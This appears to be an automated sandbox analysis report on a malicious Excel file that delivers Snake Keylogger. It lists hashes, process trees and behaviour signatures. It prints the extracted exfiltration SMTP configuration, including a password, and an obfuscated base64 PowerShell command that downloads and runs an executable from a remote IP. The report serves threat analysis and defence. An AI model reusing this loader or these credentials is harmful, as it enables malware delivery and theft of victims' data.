Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
01-10-2024 08:02
Static task
static1
Behavioral task
behavioral1
Sample
CANADAXORDER.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
CANADAXORDER.xls
Resource
win10v2004-20240802-en
General
-
Target
CANADAXORDER.xls
-
Size
866KB
-
MD5
b74b9f77a4f538ff131c1be7ed01414f
-
SHA1
25dac77c5cf517d87da4e2b936a294b88c73185d
-
SHA256
c041864b59bbcc3ffb518337b77a636aa23967f552ec712ffebc25df56f399f1
-
SHA512
19b80ce89cef0288e95081dab9da47df5afc20a958159cd9ac9f96177fb0e249ee713524f703109b3effaf1f48a28251187fd6b0c2eb59d4be870d0eb53932c7
-
SSDEEP
24576:2VgVPjrLE7wRtMk8gwYRJBeMgBDDb/7zpkH/6:2yjXE7wRKzERJTgBXbm
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.teilecar.com - Port:
587 - Username:
[email protected] - Password:
Manta924porsche=911 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/324-64-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/324-65-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/324-66-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 3 IoCs
flow pid Process 10 2944 mshta.exe 11 2944 mshta.exe 13 2728 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2728 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2516 taskhostw.exe -
Loads dropped DLL 1 IoCs
pid Process 2728 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00070000000190c6-56.dat autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2516 set thread context of 324 2516 taskhostw.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2236 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2728 powershell.exe 2728 powershell.exe 2728 powershell.exe 324 RegSvcs.exe 324 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2516 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2728 powershell.exe Token: SeDebugPrivilege 324 RegSvcs.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2236 EXCEL.EXE 2236 EXCEL.EXE 2236 EXCEL.EXE 2236 EXCEL.EXE 2236 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2944 wrote to memory of 2628 2944 mshta.exe 33 PID 2944 wrote to memory of 2628 2944 mshta.exe 33 PID 2944 wrote to memory of 2628 2944 mshta.exe 33 PID 2944 wrote to memory of 2628 2944 mshta.exe 33 PID 2628 wrote to memory of 2728 2628 cmd.exe 35 PID 2628 wrote to memory of 2728 2628 cmd.exe 35 PID 2628 wrote to memory of 2728 2628 cmd.exe 35 PID 2628 wrote to memory of 2728 2628 cmd.exe 35 PID 2728 wrote to memory of 2352 2728 powershell.exe 36 PID 2728 wrote to memory of 2352 2728 powershell.exe 36 PID 2728 wrote to memory of 2352 2728 powershell.exe 36 PID 2728 wrote to memory of 2352 2728 powershell.exe 36 PID 2352 wrote to memory of 1184 2352 csc.exe 37 PID 2352 wrote to memory of 1184 2352 csc.exe 37 PID 2352 wrote to memory of 1184 2352 csc.exe 37 PID 2352 wrote to memory of 1184 2352 csc.exe 37 PID 2728 wrote to memory of 2516 2728 powershell.exe 39 PID 2728 wrote to memory of 2516 2728 powershell.exe 39 PID 2728 wrote to memory of 2516 2728 powershell.exe 39 PID 2728 wrote to memory of 2516 2728 powershell.exe 39 PID 2516 wrote to memory of 324 2516 taskhostw.exe 40 PID 2516 wrote to memory of 324 2516 taskhostw.exe 40 PID 2516 wrote to memory of 324 2516 taskhostw.exe 40 PID 2516 wrote to memory of 324 2516 taskhostw.exe 40 PID 2516 wrote to memory of 324 2516 taskhostw.exe 40 PID 2516 wrote to memory of 324 2516 taskhostw.exe 40 PID 2516 wrote to memory of 324 2516 taskhostw.exe 40 PID 2516 wrote to memory of 324 2516 taskhostw.exe 40 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\CANADAXORDER.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2236
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C POWERsheLl -eX bYPASs -NOp -w 1 -c DEViceCReDenTIalDEPlOYmEnT.EXE ; iEX($(iEx('[SYsteM.TExt.EncOdINg]'+[CHar]0x3A+[CHAr]0x3A+'utF8.GEtstrInG([sySteM.cOnVERT]'+[cHAr]0X3A+[char]58+'FROMBaSE64STRinG('+[char]34+'JHlXZHp3VklSYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CRXJERWZJTkl0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZVFJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1WLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrSndka0tHYWJ4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhjZmRoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVHhuIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Y3QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlXZHp3VklSYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzUwL3Rhc2tob3N0dy5leGUiLCIkZW5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtTdEFSdC1TTGVFUCgzKTtzVEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[Char]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOWERsheLl -eX bYPASs -NOp -w 1 -c DEViceCReDenTIalDEPlOYmEnT.EXE ; iEX($(iEx('[SYsteM.TExt.EncOdINg]'+[CHar]0x3A+[CHAr]0x3A+'utF8.GEtstrInG([sySteM.cOnVERT]'+[cHAr]0X3A+[char]58+'FROMBaSE64STRinG('+[char]34+'JHlXZHp3VklSYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CRXJERWZJTkl0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZVFJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1WLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrSndka0tHYWJ4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhjZmRoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVHhuIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Y3QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlXZHp3VklSYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzUwL3Rhc2tob3N0dy5leGUiLCIkZW5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtTdEFSdC1TTGVFUCgzKTtzVEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[Char]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ycxlfixw.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF49.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDF48.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:1184
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:324
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD5bb055b92cc315e18e6d7a1724cdf2b29
SHA14c34f3dcaab71995c739787e072156ea969bd82a
SHA25667749b127e6fc8a6d68fcc3efb7708795c530e72b08bd831c025c7131a3049fa
SHA512c048474c88f81466cd2837ea27feceee1a289f440f20229adb5a86152410926477de492fb84176d15b43660e3b50d700d12037c15ae771a70fd33c3ff103720d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD5b50c04534e7ec419a07e8fce0cce1085
SHA11b825585455c1a83641ce210daa3285f01ae736b
SHA2569ce781c4a64b1047022efb1458d75d77b044d6c946f56137b496fda553cb1758
SHA512fc3d4940ea403410f517ca8f4ab04a3e72c19933a3cead7a906b66328ac3f9e8102bd7caac040fd1766dc75343f896628798846c29d983c93ad9eb56486da8b5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5\niceworkwitheverybody[1].hta
Filesize8KB
MD546f7566c298cdc31ac0c0f7c7800d02e
SHA17ccaa47baaec50720f0f6cbccfff28947eee0d59
SHA2564ac90b298cf34de897cee2147b6f3feb9236afdaa085f45c8d43dfdbf154a492
SHA51253b97bd148afe1d3eda168418f0abcc75a7213b5339d1f481335d025a1cf7a84205b456e5bf7cf87bfd29bb12baf4c780274e4a7be3b8ba92eaa2e3ad4fea285
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD501d01e4d1185cbde73fb4f750c843e18
SHA10394c2ba41a29587c2535294059ea7df72c3fcaa
SHA2568bb97891699fca5012ac24aea40e899c7bf1e1459084cc5a3d043e7499d8defc
SHA512946408785011e79543386cb8e6e56fe55a187d5a90f628e9e45dea4cbde8dcd1d6f54afb0a877c3294ed0c8564afffac7d5e471e7b76d1ad78b1fbe350ecaafd
-
Filesize
3KB
MD53d8b45f2987d7741be9ec4cd057892c4
SHA104294c625fc06b69b731b679b8679773a1d36656
SHA256bfc4b0c31ebd46cbcda7d30d8342ef1bb798fb3177f7f87634dff7fc85fc12b7
SHA512701f1c933468ba921b8eefa9543d690b8c9aab9da292ed5613144dd1ca31c22b20fd40d3c9793d72a9cdff02f692e39052b802d3ca63e9a7187d9bbf963a5616
-
Filesize
7KB
MD50e29a1287c6c0b16ee29010881e5562f
SHA10b11bc72f38f94fd463b1d885f4fcfee2312cf6a
SHA25643a1e06cac0a813aaabef40cb54d0676d7385cec937179cfd26ad7d3692bc38b
SHA5121b5bdbb6d2d991295fa1dfd9eebe11b8ada5706290c3b044ffb2330dc58e1b14305eb91e3cf4e224d6e6679f254ae81ff1702aa273ca9a9289806ad51700d861
-
Filesize
927KB
MD572489275d4647bac97371516cc034a56
SHA1154f42f5b5b2dee0407813f4b86ebc3b75313e89
SHA2562ef8baaa2ea5cbf4bc00e9435c8191b1e57470a021819314692c9a13f26e5e82
SHA51218dd73769d62999c7cd408377ca374b0df71a59703f810ead593ea37c49280c4b1f03b0192371aef4750dba60a25b26e2dcf44024ec13bf520e83740d904fc6c
-
Filesize
652B
MD5686c2e3e100f383a647d1e36cc8d466f
SHA1d1a11c562474389d191e0c92ebee7284c3a26b7b
SHA2560f6b02eb40a967b173e43564107ab88affca24eb2ac5d06a3ce94613eeaba484
SHA51252aa7e879ff83c4089bdac3064ce2c46c7d10074bb1a367d1a8afe683c30e236eb8f7d441880a33a78f3de87bc79364c48ebb7e5e3ab11898bbd5432ac2f4327
-
Filesize
463B
MD526586cfd3feae7a8042b855cf878e0b2
SHA1fd8d93697c49047ddbcaaee8475061a4894a3906
SHA2560374876ae0666d1d4296d2d500351e292b0ec565b31aac339abf1c551b2a26bd
SHA512942f19de8f09985f9f39724b270bca2fe2c29b96ff1cf4db9fdb961321b3442b5266aaa437ed3f87c94e60e7c7f6f84b3bee4bd810284800cde7d53cbf6a84c6
-
Filesize
309B
MD546559d136895fcc280e938c7dc9511cd
SHA1b2ebdbf86dd08e0127eb43b5a048da94d66070b1
SHA25621477f031c7cff54b089e08c340b722de52250daffbb33adf5573bf176b4fecf
SHA512345888f3fe47e935d59603b64bb2d945d0ab7172e15c6677f20342c2763f2e3fec6f0ee14b79787f7485f8a962499fa62de4095de939fd2eea61a0f3ba2c1cff